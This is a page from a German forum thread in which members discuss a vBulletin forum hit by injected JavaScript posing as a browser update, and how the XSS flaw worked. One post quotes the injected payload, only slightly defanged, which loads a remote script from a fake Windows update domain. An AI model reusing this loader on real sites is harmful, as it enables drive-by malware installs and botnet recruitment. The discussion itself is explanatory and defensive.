Seite 2 von 3 ErsteErste 123 LetzteLetzte
Ergebnis 16 bis 30 von 42

Thema: Forum infiziert!

  1. #16
    Registriert seit
    29.03.2006
    Beiträge
    5.311
    Zitat Zitat von Redbull Beitrag anzeigen
    da ist noch nicht mal ein link drin in dem beitrag, was macht ihr hier für einen alarm? :o
    Beitrag wurde gelöscht und User gesperrt...

    Allerdings hatte als es ausfiel der einzige Mod der gerade aktiv war, keine Rechte im BOS-Forum um auch den Beitrag zu löschen ;)

    MfG Fabsi

  2. #17
    Registriert seit
    27.02.2002
    Beiträge
    5.255
    Zitat Zitat von Redbull Beitrag anzeigen
    da ist noch nicht mal ein link drin in dem beitrag, was macht ihr hier für einen alarm? :o
    Man braucht kein Link, der Browser versucht in vestimmten Fällen automatisch was nachzuladen.
    Wir lassen Messer und Gabel liegen ...
    ... um mit der "Schere" anderen zu helfen.

  3. #18
    Registriert seit
    28.01.2007
    Beiträge
    696
    joa und alles durch den scanner beim hochladen ?? glaube das würde viel speicher und zeit dauern .....

  4. #19
    Registriert seit
    28.11.2005
    Beiträge
    2.759
    Sagt mal, kann mir jemand eine "von Hand" Anleitung zur Installation dieses Trojaners
    geben ? Mein Linux will und will den einfach nicht automatisch starten ^^

    Ich glaube, all die Apfel-User da draussen können von dem Problem auch dasselbe Lied
    singen ..

    All die nette Software, die sich automatisch aufdrängen will, und ich kann sie einfach
    nicht nutzen :-(
    --
    In a world without walls and fences, who needs Windows and Gates ??

    Meine private Webseite: http://www.db1jat.org

  5. #20
    Registriert seit
    05.07.2008
    Beiträge
    147
    Bei Äpfeln und Pinguinen kommt halt nicht alles durchs "Fenster" geflogen ;)

  6. #21
    Registriert seit
    08.06.2007
    Beiträge
    709
    kann mir jmd als zufriedener windows nutzer erklären wie diese art angriff überhaupt funktioniert und keine sicherheitsmaßnahmen greifen?

  7. #22
    Registriert seit
    01.08.2007
    Beiträge
    557
    Schwachstelle in der Forensoftware suchen, finden &nutzen-->javascript code einfüge-->Voila der Browser meldet Update

  8. #23
    Registriert seit
    08.06.2007
    Beiträge
    709
    ah und wie wird der eingefügt?


    was in den beitrag geschrieben oder während der beitrag an den server gesendet wird?

  9. #24
    Registriert seit
    01.08.2007
    Beiträge
    557
    ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.

  10. #25
    Registriert seit
    23.04.2003
    Beiträge
    807
    Zitat Zitat von Firefighter Heiti Beitrag anzeigen
    ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
    Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein
    Code:
    {script}
    Hier Schadcode nach wahl
    {/script}
    benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hier

    EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht

  11. #26
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso...

    ich dachte auch das die software sowas filtert....


    naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?

  12. #27
    Registriert seit
    01.08.2002
    Beiträge
    594
    Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:


    XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'>")


    (die XXX sind nur Platzhalter - damit das Ding etwas entschärft ist)

    Würde mich interessieren, was er damit bezwecken will.... Vielleicht kommt er ja noch wieder und klärt uns auf.

  13. #28
    Registriert seit
    01.08.2007
    Beiträge
    557
    Zitat Zitat von Pipsi Beitrag anzeigen
    Würde mich interessieren, was er damit bezwecken will....
    Ein BOT-Netz aufbauen :)

    hier wird der gute Glaube und der Up-to-date Sinn der Internetnutzer ausgenutzt.

    Zitat Zitat von getreu dem Motto
    "Von Adobe, das kann ja nicht falsch sein."

  14. #29
    Registriert seit
    06.08.2005
    Beiträge
    3.336
    Zitat Zitat von bastelheini Beitrag anzeigen
    achso...

    ich dachte auch das die software sowas filtert....


    naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?
    Sie filterts nicht, weil sie's nicht erkennt, ob es was Schadhaftes ist oder solche netten Hinweis-Boxen wie wir Mods sie gerne verwenden.

    Ist aber nun alles deaktiviert.
    Schöne Grüße,
    abc-truppe
    Mod-Team
    (Kleinanzeigen, Off-Topic)

  15. #30
    Registriert seit
    08.06.2007
    Beiträge
    709
    achso:)

    kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •